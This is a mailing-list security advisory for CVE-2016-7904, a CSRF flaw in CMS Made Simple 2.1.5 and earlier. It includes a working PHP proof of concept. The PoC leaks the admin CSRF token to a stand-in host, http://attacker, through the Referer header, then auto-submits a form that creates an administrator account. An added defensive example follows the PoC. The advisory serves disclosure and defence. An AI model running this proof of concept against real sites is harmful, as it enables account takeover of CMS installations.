Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
From: "Hongkun Zeng" <hongkun.zeng@...ppsecurity.com.cn>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF

Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
CVE: CVE-2016-7904
Discovered by: Hongkun Zeng (http://www.dbappsecurity.com.cn/)


CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) that provides developers, programmers and site owners with a web-based development and administration area.


This is a security issue in CMSMS. Low privilege users were able to gain control of an administrative session through a CSRF attack.


Add an article and insert an image whose link points to http://attacker/csrfpoc.php; the Referer header sent to that URL then leaks the user's CSRF token (_sk_), which the admin page carries in its query string.


POC:
```php
//File: csrfpoc.php
<?php
session_start();

// Bail out unless a Referer is present or a token was already captured.
if (!isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_'])) {
    exit;
}

// The admin page URL carries the CSRF token (_sk_) in its query string, so the
// Referer header sent when the inserted image/link is followed contains it.
if (isset($_SERVER['HTTP_REFERER'])) {
    $parsed_url = parse_url($_SERVER['HTTP_REFERER']);
    // parse_str() expects a bare query string; a leading '?' would make the
    // first key parse as '?_sk_' instead of '_sk_'.
    $query = isset($parsed_url['query']) ? $parsed_url['query'] : '';
    parse_str($query, $arr);
    if (isset($arr['_sk_'])) {
        $_SESSION['_sk_'] = $arr['_sk_'];
    }
}
if (!isset($_SESSION['_sk_'])) {
    exit;
}
?>

<form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'>
<input type="text" name="_sk_" value="<?php echo $_SESSION['_sk_'];?>" />
<input type="text" name="user" value="test" />
<input type="text" name="password" value="123456" />
<input type="text" name="passwordagain" value="123456" />
<input type="text" name="firstname" value="" />
<input type="text" name="lastname" value="" />
<input type="text" name="email" value="" />
<input type="text" name="active" value="1" />
<input type="text" name="sel_groups[]" value="1" />
<input type="text" name="sel_groups[]" value="2" />
<input type="text" name="sel_groups[]" value="3" />
<input type="text" name="copyusersettings" value="-1" />
<input type="text" name="submit" value="submit" />
</form>
<!-- The input named "submit" shadows form.submit(), so borrow submit() from a fresh form element. -->
<script> document.createElement('form').submit.call(document.getElementById('form')); </script>
```
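For contrast, the defensive counterpart of the bug above, as an added example that is not code from the advisory or from CMSMS: the token is never placed in a URL (so a Referer cannot carry it), outbound navigations send no Referer at all, and the state-changing endpoint checks both the session-bound token and the browser-set Origin header. The token name `_sk_` follows the advisory; `ADMIN_ORIGIN` and the function names are assumptions.

```php
<?php
// Added example (not CMSMS code). Assumes a PHP session and that the
// state-changing request posts its token in the '_sk_' field.
declare(strict_types=1);

const ADMIN_ORIGIN = 'https://cms.example';   // constructed value

// A Referer can only leak what a page URL contains, so the token lives in a
// hidden form field, never a query string; this header stops the browser
// from sending a Referer on outbound navigations (e.g. an inserted image link).
function send_csrf_headers(): void {
    header('Referrer-Policy: no-referrer');
}

// Issue a random token bound to the session.
function issue_csrf_token(): string {
    if (empty($_SESSION['_sk_'])) {
        $_SESSION['_sk_'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['_sk_'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_token_valid(?string $submitted, ?string $expected): bool {
    return is_string($submitted) && is_string($expected)
        && $submitted !== '' && hash_equals($expected, $submitted);
}

// Independent second check: a cross-site form post from http://attacker
// carries the attacker's Origin, which the browser sets and scripts cannot
// forge. A missing Origin is rejected here (strict).
function origin_allowed(?string $origin, string $expectedOrigin): bool {
    return $origin !== null && $origin === $expectedOrigin;
}

// Gate for the privileged action (the adduser endpoint in the advisory).
function request_permitted(array $post, array $server, array $session): bool {
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && csrf_token_valid($post['_sk_'] ?? null, $session['_sk_'] ?? null)
        && origin_allowed($server['HTTP_ORIGIN'] ?? null, ADMIN_ORIGIN);
}

session_start();
send_csrf_headers();
if (!request_permitted($_POST, $_SERVER, $_SESSION)) {
    http_response_code(403);
    exit('rejected');
}
// ... proceed with the privileged action ...
```

Even with the Origin check, keeping the token out of the URL matters: it also stops the token from landing in proxy and server access logs.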


Ref:
http://dev.cmsmadesimple.org/project/changelog/5392


--

Best Regards,
Hongkun Zeng
---------------------------------------------------
hongkun.zeng (at) dbappsecurity.com.cn
